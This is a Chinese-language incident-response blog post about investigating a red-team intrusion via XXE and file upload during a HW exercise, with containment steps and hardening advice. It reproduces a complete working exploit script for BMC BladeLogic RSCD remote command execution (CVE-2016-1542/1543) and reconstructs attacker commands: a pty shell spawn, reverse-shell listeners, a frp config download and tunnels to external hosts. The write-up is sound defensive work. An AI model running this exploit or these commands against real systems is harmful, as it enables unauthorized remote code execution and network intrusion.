<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico?v=5.1.4">


  <link rel="mask-icon" href="/images/favicon.ico?v=5.1.4" color="#222">





  <meta name="keywords" content="HW,IR,XXE,FileUpload,">





  <link rel="alternate" href="/atom.xml" title="HexChristmas's Blog" type="application/atom+xml">






<meta name="description" content="护网应急中的一次和红队争分夺秒的较量">
<meta name="keywords" content="HW,IR,XXE,FileUpload">
<meta property="og:type" content="article">
<meta property="og:title" content="护网-XXE&amp;文件上传应急响应">
<meta property="og:url" content="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/index.html">
<meta property="og:site_name" content="HexChristmas&#39;s Blog">
<meta property="og:description" content="护网应急中的一次和红队争分夺秒的较量">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/3.png">
<meta property="og:image" content="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/1.png">
<meta property="og:image" content="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/2.png">
<meta property="og:updated_time" content="2020-05-18T08:39:58.583Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="护网-XXE&amp;文件上传应急响应">
<meta name="twitter:description" content="护网应急中的一次和红队争分夺秒的较量">
<meta name="twitter:image" content="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/3.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/">





  <title>护网-XXE&文件上传应急响应 | HexChristmas's Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>
<a href="https://github.com/HexChristmas" class="github-corner" aria-label="View source on GitHub"><svg width="80" height="80" viewbox="0 0 250 250" style="fill:#151513; color:#fff; position: absolute; top: 0; border: 0; right: 0;" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"/><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"/><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"/></svg></a><style>.github-corner:hover .octo-arm{animation:octocat-wave 560ms ease-in-out}@keyframes octocat-wave{0%,100%{transform:rotate(0)}20%,60%{transform:rotate(-25deg)}40%,80%{transform:rotate(10deg)}}@media (max-width:500px){.github-corner:hover .octo-arm{animation:none}.github-corner .octo-arm{animation:octocat-wave 560ms ease-in-out}}</style>
    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">HexChristmas's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Hex Christmas">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="HexChristmas's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">护网-XXE&文件上传应急响应</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2020-05-18T16:31:59+08:00">
                2020-05-18
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          
              <div class="post-description">
                  护网应急中的一次和红队争分夺秒的较量
              </div>
          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h1 id="护网-XXE-amp-文件上传应急响应"><a href="#护网-XXE-amp-文件上传应急响应" class="headerlink" title="护网-XXE&amp;文件上传应急响应"></a>护网-XXE&amp;文件上传应急响应</h1><h2 id="检测阶段"><a href="#检测阶段" class="headerlink" title="检测阶段"></a>检测阶段</h2><p>某天某公司应急，从态势感知看到几十条冰蝎触发的告警，因为都是加密的所以也看不出来红队操作的都是什么。从探针上看攻击者丧心病狂的在xxe高并发碰几率，还有一个上传成功的shell，我又看了告警事发前30分钟可疑流量和后30分钟的可疑流量除了冰蝎触发的告警也没有其他能溯源发现问题的。从日志检索上看没看到14的机器有像其他机器横向的攻击迹象，没有？你敢相信，没错就是态势感知没有。所以只能去受害主机上去排查。<br>开始对受害主机进行排查，打包所有jsp文件进行排查<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find /cms -name &quot;*.jsp&quot; -exectar-zcvf eee.tar.gz&quot;&#123;&#125;&quot;+</span><br></pre></td></tr></table></figure></p>
<p>然后开始查shell<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep -RPn &quot;(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile|php_uname|eval|tcpflood|udpflood|edoced_46esab) *\(&quot; eee</span><br></pre></td></tr></table></figure></p>
<p> 发现服务器/cms/fileupload/temp下有一个名字非常奇怪的jsp，这个目录正常情况下应该是图片，文档什么的出现这个肯定是非常可疑的，所以直接mv掉了<br> 接着我们在tmp下发现一个非常奇怪的文件g1t.1<br> <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"> ➜  ./g1t.1                                     </span><br><span class="line">Usage: gettitle -i 192.168.1.1/24 -p 80,443</span><br><span class="line">Options:</span><br><span class="line">  -i string</span><br><span class="line">     iplist like 192.168.1.1/24</span><br><span class="line">  -p string</span><br><span class="line">     port like 80,443,8080</span><br><span class="line">  -t int</span><br><span class="line">     thread (default 100)</span><br></pre></td></tr></table></figure></p>
<p> <img src="/2020/05/18/护网-XXE-文件上传应急响应/3.png" alt><br> 我们发现这很明显就是个ｇｏ写的扫描器，扫的还挺快，11秒１个Ｃ段，我们发现他探测了2181端口和4750端口<br>根据和客户了解业务我们知道4750端口BMC服务器自动化RSCD系统，我们在服务器发现了一个BMC.py的文件，直觉告诉我这可能是攻击队的脚本文件，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br></pre></td><td class="code"><pre><span class="line"># Exploit Title: BMC BladeLogic RSCD agent remote exec - XMLRPC version</span><br><span class="line"># Filename: BMC_rexec.py</span><br><span class="line"># Github: https://github.com/bao7uo/bmc_bladelogic</span><br><span class="line"># Date: 2018-01-24</span><br><span class="line"># Exploit Author: Paul Taylor / Foregenix Ltd</span><br><span class="line"># Website: http://www.foregenix.com/blog</span><br><span class="line"># Version: BMC RSCD agent 8.3.00.64</span><br><span class="line"># CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)</span><br><span class="line"># Vendor Advisory: https://docs.bmc.com/docs/ServerAutomation/87/release-notes-and-notices/flashes/notification-of-critical-security-issue-in-bmc-server-automation-cve-2016-1542-cve-2016-1543</span><br><span class="line"># Tested on: 8.3.00.64</span><br><span class="line"></span><br><span class="line">#!/usr/bin/python</span><br><span class="line"></span><br><span class="line"># BMC BladeLogic RSCD agent remote exec - XMLRPC version</span><br><span class="line"># CVE: CVE-2016-1542 (BMC-2015-0010), CVE-2016-1543 (BMC-2015-0011)</span><br><span class="line"></span><br><span class="line"># By Paul Taylor / Foregenix Ltd</span><br><span class="line"></span><br><span class="line"># Credit: https://github.com/ernw/insinuator-snippets/tree/master/bmc_bladelogic</span><br><span class="line"># Credit: https://github.com/yaolga</span><br><span class="line"></span><br><span class="line"># Credit: Nick Bloor for AWS image for testing :-)</span><br><span class="line"># https://github.com/NickstaDB/PoC/tree/master/BMC_RSCD_RCE</span><br><span class="line"></span><br><span class="line">import socket</span><br><span class="line">import ssl</span><br><span class="line">import sys</span><br><span class="line">import argparse</span><br><span class="line">import requests</span><br><span class="line">import httplib</span><br><span class="line">from requests.packages.urllib3 import PoolManager</span><br><span class="line">from requests.packages.urllib3.connection import HTTPConnection</span><br><span class="line">from requests.packages.urllib3.connectionpool import HTTPConnectionPool</span><br><span class="line">from requests.adapters import HTTPAdapter</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class MyHTTPConnection(HTTPConnection):</span><br><span class="line">    def __init__(self, unix_socket_url, timeout=60):</span><br><span class="line">        HTTPConnection.__init__(self, HOST, timeout=timeout)</span><br><span class="line">        self.unix_socket_url = unix_socket_url</span><br><span class="line">        self.timeout = timeout</span><br><span class="line"></span><br><span class="line">    def connect(self):</span><br><span class="line">        self.sock = wrappedSocket</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class MyHTTPConnectionPool(HTTPConnectionPool):</span><br><span class="line">    def __init__(self, socket_path, timeout=60):</span><br><span class="line">        HTTPConnectionPool.__init__(self, HOST, timeout=timeout)</span><br><span class="line">        self.socket_path = socket_path</span><br><span class="line">        self.timeout = timeout</span><br><span class="line"></span><br><span class="line">    def _new_conn(self):</span><br><span class="line">        return MyHTTPConnection(self.socket_path, self.timeout)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class MyAdapter(HTTPAdapter):</span><br><span class="line">    def __init__(self, timeout=60):</span><br><span class="line">        super(MyAdapter, self).__init__()</span><br><span class="line">        self.timeout = timeout</span><br><span class="line"></span><br><span class="line">    def get_connection(self, socket_path, proxies=None):</span><br><span class="line">        return MyHTTPConnectionPool(socket_path, self.timeout)</span><br><span class="line"></span><br><span class="line">    def request_url(self, request, proxies):</span><br><span class="line">        return request.path_url</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def optParser():</span><br><span class="line">    parser = argparse.ArgumentParser(</span><br><span class="line">                        description=&quot;Remote exec &quot; +</span><br><span class="line">                        &quot;BladeLogic Server Automation RSCD agent&quot;</span><br><span class="line">                    )</span><br><span class="line">    parser.add_argument(&quot;host&quot;, help=&quot;IP address of a target system&quot;)</span><br><span class="line">    parser.add_argument(</span><br><span class="line">            &quot;-p&quot;,</span><br><span class="line">            &quot;--port&quot;,</span><br><span class="line">            type=int,</span><br><span class="line">            default=4750,</span><br><span class="line">            help=&quot;TCP port (default: 4750)&quot;</span><br><span class="line">            )</span><br><span class="line">    parser.add_argument(&quot;command&quot;, help=&quot;Command to execute&quot;)</span><br><span class="line">    opts = parser.parse_args()</span><br><span class="line">    return opts</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def sendXMLRPC(host, port, packet, tlsrequest):</span><br><span class="line">    r = tlsrequest.post(</span><br><span class="line">            &apos;http://&apos; + host + &apos;:&apos; + str(port) + &apos;/xmlrpc&apos;, data=packet</span><br><span class="line">        )</span><br><span class="line">    print r.status_code</span><br><span class="line">    print r.content</span><br><span class="line">    return</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">intro = &quot;&quot;&quot;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;methodCall&gt;&lt;methodName&gt;RemoteServer.intro&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;2016-1-14-18-10-30-3920958&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;7&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;0;0;21;AArverManagement_XXX_XXX:XXXXXXXX;2;CM;-;-;0;-;1;1;6;SYSTEM;CP1252;&lt;/value&gt;&lt;/param&gt;&lt;param&gt;&lt;value&gt;8.6.01.66&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;&quot;&quot;&quot;</span><br><span class="line">options = optParser()</span><br><span class="line">rexec = options.command</span><br><span class="line">PORT = options.port</span><br><span class="line">HOST = options.host</span><br><span class="line">rexec = &quot;&quot;&quot;&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?&gt;&lt;methodCall&gt;&lt;methodName&gt;RemoteExec.exec&lt;/methodName&gt;&lt;params&gt;&lt;param&gt;&lt;value&gt;&quot;&quot;&quot; + rexec  + &quot;&quot;&quot;&lt;/value&gt;&lt;/param&gt;&lt;/params&gt;&lt;/methodCall&gt;&quot;&quot;&quot;</span><br><span class="line"></span><br><span class="line">sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)</span><br><span class="line">sock.connect((HOST, PORT))</span><br><span class="line"></span><br><span class="line">sock.sendall(&quot;TLSRPC&quot;)</span><br><span class="line">wrappedSocket = ssl.wrap_socket(sock)</span><br><span class="line"></span><br><span class="line">adapter = MyAdapter()</span><br><span class="line">s = requests.session()</span><br><span class="line">s.mount(&quot;http://&quot;, adapter)</span><br><span class="line"></span><br><span class="line">sendXMLRPC(HOST, PORT, intro, s)</span><br><span class="line">sendXMLRPC(HOST, PORT, rexec, s)</span><br><span class="line"></span><br><span class="line">wrappedSocket.close()</span><br></pre></td></tr></table></figure></p>
<p>通过浏览我们发现这很明显就是CVE-2016-1543的exp，这个自动化运维平台托管着几百台服务器，如果攻击队拿下这个应该算是拿到很高的分数了<br>我们在/root下发现了.sh_history，诶我一看很可疑，原来红队冰蝎进来之后<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &apos;import pty;pty.spawn(&quot;/bin/sh&quot;)&apos;</span><br></pre></td></tr></table></figure></p>
<p>起了个sh的shell，ntpdate去同步时间，在各种ifconfig探测网断，网络结构，直接find去查找9631584.jsp这个木马文件，然后wget去下载 frps.ini文件进行转发，curl访问<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://121.x.x.176:8000</span><br></pre></td></tr></table></figure></p>
<p>端口，netstat -ano查看运行进程，又在find找9631584.jsp这个木马文件，然后回到<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/export/../../../client_war.ear/client.war/xlsfiles/</span><br></pre></td></tr></table></figure></p>
<p>删掉了所有jsp文件和xls文件，将124.jsp重命名为xwaytest.jsp文件，回到<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/export//../../../client_war.ear/client.war/xlsfiles/</span><br></pre></td></tr></table></figure></p>
<p>再次删掉了所有jsp文件和xls文件，将124.jsp重命名为xwaytest.jsp文件，cd到tmp目录下启动python端口以及ip扫描器对10.x.x1.1/24网断进行探测，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ps -efo uid,pid,ppid,pcpu,pmem,vsz,rss,osz,etime,stime,com</span><br></pre></td></tr></table></figure></p>
<p>来探测僵尸进行（不清楚为什么这么搞，也许是为了搞清楚系统各情况），然后又用<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python对10.x1.x1.1/24发起了扫描</span><br></pre></td></tr></table></figure></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl http://10.x1.x2.x/Channel/145x17</span><br></pre></td></tr></table></figure>
<p>分别对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.x1.x.x0 10.x1.8x.3x 10.x1.x2.2x</span><br></pre></td></tr></table></figure></p>
<p>进行了ping的连通性测试，又对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1x.4x.x.x/24</span><br></pre></td></tr></table></figure></p>
<p>用python扫描器发起的扫描。对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1x.4x.8x.1/24</span><br></pre></td></tr></table></figure></p>
<p>进行了扫描，对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">10.x.x2.1/24</span><br><span class="line">`</span><br></pre></td></tr></table></figure></p>
<p>发起了扫描并输出txt文件到1011.txt中，对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.x.x.1/24</span><br></pre></td></tr></table></figure></p>
<p>发起了扫描输出文件到yunwei.txt文件中，对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.x.0.0</span><br></pre></td></tr></table></figure></p>
<p>整个b段进行了扫描并输出了txt文件到yunwei2.txt，然后起了nc监听8767反弹shell。</p>
<p>将自己的ssh密钥写入机器，建立test用户并设置密码，在tmp利用了BMC.py的脚本，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ssh 127.0.0.1 -I /etc/passwd.</span><br></pre></td></tr></table></figure></p>
<p>也不知道这是什么迷惑行为<br>在<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.x.1x.1x</span><br></pre></td></tr></table></figure></p>
<p>机器上发现攻击者使用ping检测网络连通性，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">telnet 121.201.10.53 80</span><br></pre></td></tr></table></figure></p>
<p>然后就find疯狂在<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/export/../../../../client.war/</span><br></pre></td></tr></table></figure></p>
<p>找1Aa.xls以及shell.jsp的木马文件，到tmp<br>目录下对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.x.2x.1/24</span><br></pre></td></tr></table></figure></p>
<p>进行了80与445端口探测，与此同时还查看了ip地址，主机名，用户id，用户名称，用户登陆，内核版本，当前进程，对<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">10.x.1x.1/24</span><br></pre></td></tr></table></figure></p>
<p>对445 3389端口进行了端口探测，python建立socker5代理端口82反弹到公网<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ip1x.2x.1x.53</span><br></pre></td></tr></table></figure></p>
<p>利用curl去访问<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://10.1x.2x.7x5:8080/aaa</span><br></pre></td></tr></table></figure></p>
<p>中aaa的内容，其实aaa也没什么东西估计就是在探测tomcat版本，<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/tmp/hsperfdata_root/</span><br></pre></td></tr></table></figure></p>
<p>下启动了ew建立隧道的动作，反弹到1x.2x.1x.53地址，接下来就是一顿反弹shell。</p>
<h2 id="抑制阶段"><a href="#抑制阶段" class="headerlink" title="抑制阶段"></a>抑制阶段</h2><ol>
<li>删除webshell后门</li>
<li>升级BCM到最新版本或暂时下架设备</li>
<li>禁用4750端口</li>
<li>移除隧道梯子</li>
<li>删除攻击者在authorized_keys留下的公钥</li>
<li>修改受感染机器的密码</li>
</ol>
<h2 id="根除阶段"><a href="#根除阶段" class="headerlink" title="根除阶段"></a>根除阶段</h2><p>根据攻击者收集到的信息，对十几台重要并涉及事件的主机进行排查并清楚，攻击者均已将公钥写入了authorized_keys，并在主机留下了BMC.py的exp脚本，并未发现其他攻击特征和样本。</p>
<h2 id="相关安全建议"><a href="#相关安全建议" class="headerlink" title="相关安全建议"></a>相关安全建议</h2><ol>
<li>系统、应用相关用户杜绝使用弱口令，应使用高复杂强度的密码，尽量包含大小写字母、数字、特殊符号等的混合密码，加强管理员安全意识，禁止密码重用的情况出现；</li>
<li>禁止服务器主动发起外部连接请求，对于需要向外部服务器推送共享数据的，应使用白名单的方式，在出口防火墙加入相关策略，对主动连接IP范围进行限制；</li>
<li>有效加强访问控制ACL策略，细化策略粒度，按区域按业务严格限制各个网络区域以及服务器之间的访问，采用白名单机制只允许开放特定的业务必要端口，其他端口一律禁止访问，仅管理员IP可对管理端口进行访问，如FTP、数据库服务、远程桌面等管理端口；</li>
<li>部署高级威胁监测设备，及时发现恶意网络流量，同时可进一步加强追踪溯源能力，对安全事件发生时可提供可靠的追溯依据；</li>
<li>配置并开启相关关键系统、应用日志，对系统日志进行定期异地归档、备份，避免在攻击行为发生时，导致无法对攻击途径、行为进行溯源等，加强安全溯源能力；</li>
<li>建议在服务器或虚拟化环境上部署虚拟化安全管理系统，提升防恶意软件、防暴力破解等安全防护能力；</li>
<li>建议安装相应的防病毒软件，及时对病毒库进行更新，并且定期进行全面扫描，加强服务器上的病毒清除能力；</li>
<li>定期开展对系统、应用以及网络层面的安全评估、渗透测试以及代码审计工作，主动发现目前系统、应用存在的安全隐患；</li>
<li>加强日常安全巡检制度，定期对系统配置、网络设备配合、安全日志以及安全策略落实情况进行检查，常态化信息安全工作；</li>
</ol>
<h2 id="攻击复现"><a href="#攻击复现" class="headerlink" title="攻击复现"></a>攻击复现</h2><p><img src="/2020/05/18/护网-XXE-文件上传应急响应/1.png" alt><br><img src="/2020/05/18/护网-XXE-文件上传应急响应/2.png" alt></p>

      
    </div>
    
    
    

<div>
    
        
<div class="my_post_copyright">
  <script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>
  
  <!-- JS库 sweetalert 可修改路径 -->
  <script type="text/javascript" src="http://jslibs.wuxubj.cn/sweetalert_mini/jquery-1.7.1.min.js"></script>
  <script src="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.min.js"></script>
  <link rel="stylesheet" type="text/css" href="http://jslibs.wuxubj.cn/sweetalert_mini/sweetalert.mini.css">

  <p><span>本文标题:</span>护网-XXE&文件上传应急响应</p>
  <p><span>文章作者:</span>Hex Christmas</p>
  <p><span>发布时间:</span>2020年05月18日 - 16:31:59</p>
  <p><span>最后更新:</span>2020年05月18日 - 16:39:58</p>
  <p><span>原始链接:</span><a href="/2020/05/18/护网-XXE-文件上传应急响应/" title="护网-XXE&文件上传应急响应">https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/</a>
    <span class="copy-path" title="点击复制文章链接"><i class="fa fa-clipboard" data-clipboard-text="https://hexchristmas.github.io/2020/05/18/护网-XXE-文件上传应急响应/" aria-label="复制成功！"></i></span>
  </p>
  <p><span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/" target="_blank" title="Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0)">署名-非商业性使用-禁止演绎 4.0 国际</a> 转载请保留原文链接及作者。</p>  
</div>
<script> 
    var clipboard = new Clipboard('.fa-clipboard');
    clipboard.on('success', $(function(){
      $(".fa-clipboard").click(function(){
        swal({   
          title: "",   
          text: '复制成功',   
          html: false,
          timer: 500,   
          showConfirmButton: false
        });
      });
    }));  
</script>


    
</div>

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
